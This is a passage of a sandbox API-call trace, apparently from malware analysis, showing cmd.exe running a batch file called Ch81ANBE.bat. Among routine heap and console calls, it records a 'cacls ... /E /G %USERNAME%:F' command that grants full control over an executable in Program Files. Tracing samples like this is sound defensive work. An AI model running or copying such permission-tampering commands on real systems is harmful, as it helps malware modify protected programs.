(HeapHandle=0x390000, Flags=0x8, Size=0x84) returned 0x3a31e8 [0209.255] GetConsoleTitleW (in: lpConsoleTitle=0x2ef500, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.256] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0209.257] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0209.257] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0209.257] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0209.257] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0209.257] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0209.257] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0209.257] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0209.257] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0209.257] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0209.257] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0209.257] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0209.257] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0209.257] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0209.257] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0209.257] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0209.257] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0209.257] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0209.257] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0209.257] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0209.257] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0209.258] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0209.258] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0209.258] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0209.258] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0209.258] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0209.258] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0209.258] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0209.258] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0209.258] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0209.258] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0209.258] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0209.258] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0209.258] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0209.258] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0209.258] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0209.258] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0209.259] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0209.259] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0209.259] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0209.259] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0209.259] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0209.259] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0209.259] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0209.259] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0209.259] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0209.259] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0209.259] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0209.259] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0209.259] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0209.259] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0209.259] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0209.259] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0209.260] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0209.260] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0209.260] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0209.260] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0209.260] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0209.260] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0209.260] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0209.260] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0209.260] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0209.260] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0209.260] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0209.260] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0209.260] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0209.261] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0209.261] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0209.261] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0209.261] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0209.261] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0209.261] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0209.261] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0209.261] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0209.261] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0209.261] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0209.261] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0209.261] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0209.261] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0209.261] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0209.261] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0209.261] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0209.261] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0209.261] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0209.262] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0209.262] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0209.262] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0209.262] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0209.262] GetProcessHeap () returned 0x390000 [0209.262] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x210) returned 0x3a3278 [0209.262] GetProcessHeap () returned 0x390000 [0209.262] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xee) returned 0x3a3490 [0209.264] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0209.264] GetProcessHeap () returned 0x390000 [0209.264] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x418) returned 0x3907f0 [0209.264] SetErrorMode (uMode=0x0) returned 0x0 [0209.264] SetErrorMode (uMode=0x1) returned 0x0 [0209.265] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x3907f8, lpFilePart=0x2ef020 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef020*="Desktop") returned 0x25 [0209.265] SetErrorMode (uMode=0x0) returned 0x1 [0209.265] GetProcessHeap () returned 0x390000 [0209.265] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3907f0, Size=0x6e) returned 0x3907f0 [0209.265] GetProcessHeap () returned 0x390000 [0209.265] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3907f0) returned 0x6e [0209.265] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0209.265] GetProcessHeap () returned 0x390000 [0209.265] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x5a) returned 0x3a3588 [0209.265] GetProcessHeap () returned 0x390000 [0209.265] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xa8) returned 0x3a35f0 [0209.266] GetProcessHeap () returned 0x390000 [0209.266] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3a35f0, Size=0x5a) returned 0x3a35f0 [0209.266] GetProcessHeap () returned 0x390000 [0209.266] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3a35f0) returned 0x5a [0209.266] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.266] GetProcessHeap () returned 0x390000 [0209.266] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xe0) returned 0x390868 [0210.161] GetProcessHeap () returned 0x390000 [0210.161] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x390868, Size=0x76) returned 0x390868 [0210.161] GetProcessHeap () returned 0x390000 [0210.161] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x390868) returned 0x76 [0210.161] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.162] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x2eedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedbc) returned 0x3a3658 [0210.162] GetProcessHeap () returned 0x390000 [0210.162] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x0, Size=0x14) returned 0x3a3698 [0210.162] FindClose (in: hFindFile=0x3a3658 | out: hFindFile=0x3a3658) returned 1 [0210.162] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0210.162] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0210.162] GetConsoleTitleW (in: lpConsoleTitle=0x2ef294, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.162] GetProcessHeap () returned 0x390000 [0210.162] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x11c) returned 0x3908e8 [0210.162] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0210.162] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0210.162] IdentifyCodeAuthzLevelW () returned 0x1 [0210.168] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0210.168] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0210.168] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0210.169] CloseCodeAuthzLevel () returned 0x1 [0210.169] SetErrorMode (uMode=0x0) returned 0x0 [0210.169] SetErrorMode (uMode=0x1) returned 0x0 [0210.169] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x3a3280, lpFilePart=0x2ef180 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x2ef180*="Ch81ANBE.bat") returned 0x32 [0210.169] SetErrorMode (uMode=0x0) returned 0x1 [0210.169] GetProcessHeap () returned 0x390000 [0210.169] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x72) returned 0x3b2bd0 [0210.169] wcsspn (_String=" \"C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\"", _Control=" \x09") returned 0x1 [0210.169] GetProcessHeap () returned 0x390000 [0210.169] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x82) returned 0x391140 [0210.169] GetProcessHeap () returned 0x390000 [0210.169] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xfc) returned 0x3b4b38 [0210.169] GetProcessHeap () returned 0x390000 [0210.169] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3b4b38, Size=0x84) returned 0x3b4b38 [0210.169] GetProcessHeap () returned 0x390000 [0210.169] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3b4b38) returned 0x84 [0210.169] CmdBatNotification () returned 0x3a32e2 [0210.169] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ef1c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0210.170] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0210.170] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.170] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.170] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.171] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.171] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2ef1a8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2ef1a8*=0xe2, lpOverlapped=0x0) returned 1 [0210.171] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0210.171] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0210.173] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.173] GetFileType (hFile=0x78) returned 0x1 [0210.173] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.173] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0210.173] GetProcessHeap () returned 0x390000 [0210.173] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400a) returned 0x3a6b00 [0210.173] GetProcessHeap () returned 0x390000 [0210.173] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x4008) returned 0x3b4bc8 [0210.173] GetProcessHeap () returned 0x390000 [0210.174] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x1a) returned 0x3a5850 [0210.174] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0210.174] GetProcessHeap () returned 0x390000 [0210.174] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a5850 | out: hHeap=0x390000) returned 1 [0210.174] GetProcessHeap () returned 0x390000 [0210.174] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3b4bc8 | out: hHeap=0x390000) returned 1 [0210.174] GetProcessHeap () returned 0x390000 [0210.174] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a6b00 | out: hHeap=0x390000) returned 1 [0210.175] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0210.175] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0210.175] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0210.175] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0210.175] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0210.175] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0210.175] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0210.175] GetProcessHeap () returned 0x390000 [0210.175] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x58) returned 0x3911d0 [0210.175] GetProcessHeap () returned 0x390000 [0210.175] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x14) returned 0x391230 [0210.179] GetProcessHeap () returned 0x390000 [0210.179] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xc4) returned 0x3a41a0 [0210.181] _tell (_FileHandle=3) returned 32 [0210.181] _close (_FileHandle=3) returned 0 [0210.181] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2eef7c | out: _Buffer="\r\n") returned 2 [0210.182] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.182] GetFileType (hFile=0x7) returned 0x2 [0210.183] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.183] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef3c | out: lpMode=0x2eef3c) returned 1 [0210.184] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.184] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2eef68, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eef68*=0x2) returned 1 [0210.184] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0210.184] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0210.184] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2eef78 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0210.185] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2eef78 | out: _Buffer=">") returned 1 [0210.185] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.185] GetFileType (hFile=0x7) returned 0x2 [0210.185] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.185] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef40 | out: lpMode=0x2eef40) returned 1 [0210.186] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.186] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2eef6c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2eef6c*=0x26) returned 1 [0210.187] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.187] GetFileType (hFile=0x7) returned 0x2 [0210.187] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.187] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1c4 | out: lpMode=0x2ef1c4) returned 1 [0210.188] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.188] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x391238*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2ef1f0, lpReserved=0x0 | out: lpBuffer=0x391238*, lpNumberOfCharsWritten=0x2ef1f0*=0x5) returned 1 [0210.188] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef1fc | out: _Buffer=" \"C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 94 [0210.188] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.188] GetFileType (hFile=0x7) returned 0x2 [0210.189] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.189] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1bc | out: lpMode=0x2ef1bc) returned 1 [0210.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.189] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x2ef1e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef1e8*=0x5e) returned 1 [0210.190] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef21c | out: _Buffer="\r\n") returned 2 [0210.190] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.190] GetFileType (hFile=0x7) returned 0x2 [0210.194] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.194] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1dc | out: lpMode=0x2ef1dc) returned 1 [0210.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.194] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef208, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef208*=0x2) returned 1 [0210.195] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0210.195] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0210.195] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0210.195] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0210.195] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0210.195] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0210.195] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0210.195] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0210.195] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0210.195] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0210.195] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0210.195] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0210.195] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0210.196] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0210.196] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0210.196] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0210.196] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0210.196] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0210.196] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0210.196] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0210.196] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0210.196] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0210.196] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0210.196] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0210.196] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0210.196] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0210.196] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0210.196] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0210.196] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0210.196] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0210.196] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0210.196] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0210.197] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0210.197] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0210.197] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0210.197] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0210.197] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0210.197] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0210.197] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0210.197] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0210.197] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0210.197] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0210.197] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0210.198] GetProcessHeap () returned 0x390000 [0210.198] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x418) returned 0x3a4270 [0210.198] SetErrorMode (uMode=0x0) returned 0x0 [0210.198] SetErrorMode (uMode=0x1) returned 0x0 [0210.198] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a4278, lpFilePart=0x2eefc0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2eefc0*="Desktop") returned 0x25 [0210.198] SetErrorMode (uMode=0x0) returned 0x1 [0210.198] GetProcessHeap () returned 0x390000 [0210.198] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3a4270, Size=0x60) returned 0x3a4270 [0210.198] GetProcessHeap () returned 0x390000 [0210.198] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3a4270) returned 0x60 [0210.198] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0210.198] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.198] GetProcessHeap () returned 0x390000 [0210.199] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x120) returned 0x3a42d8 [0210.199] GetProcessHeap () returned 0x390000 [0210.199] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x238) returned 0x3a4400 [0210.203] GetConsoleTitleW (in: lpConsoleTitle=0x2eed8c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.621] GetConsoleTitleW (in: lpConsoleTitle=0x2eeb20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.621] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ee9a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2eea70 | out: lpAttributeList=0x2ee9a8, lpSize=0x2eea70) returned 1 [0210.621] UpdateProcThreadAttribute (in: lpAttributeList=0x2ee9a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2eea68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ee9a8, lpPreviousValue=0x0) returned 1 [0210.621] GetStartupInfoW (in: lpStartupInfo=0x2ee964 | out: lpStartupInfo=0x2ee964*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0211.129] CloseHandle (hObject=0x78) returned 1 [0211.155] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.155] GetProcessHeap () returned 0x390000 [0211.155] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a5fc0 | out: hHeap=0x390000) returned 1 [0211.155] GetEnvironmentStringsW () returned 0x3a5fc0* [0211.155] GetProcessHeap () returned 0x390000 [0211.155] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xb36) returned 0x3a6b00 [0211.155] FreeEnvironmentStringsW (penv=0x3a5fc0) returned 1 [0211.155] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0221.300] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x2ee944 | out: lpExitCode=0x2ee944*=0x1f57) returned 1 [0221.300] CloseHandle (hObject=0x74) returned 1 [0221.300] _vsnwprintf (in: _Buffer=0x2eea8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ee950 | out: _Buffer="00001F57") returned 8 [0221.300] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0221.300] GetProcessHeap () returned 0x390000 [0221.300] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a6b00 | out: hHeap=0x390000) returned 1 [0221.300] GetEnvironmentStringsW () returned 0x3a5fc0* [0221.300] GetProcessHeap () returned 0x390000 [0221.300] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xb5c) returned 0x3a81a8 [0221.300] FreeEnvironmentStringsW (penv=0x3a5fc0) returned 1 [0221.300] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0221.300] GetProcessHeap () returned 0x390000 [0221.301] HeapFree (in: 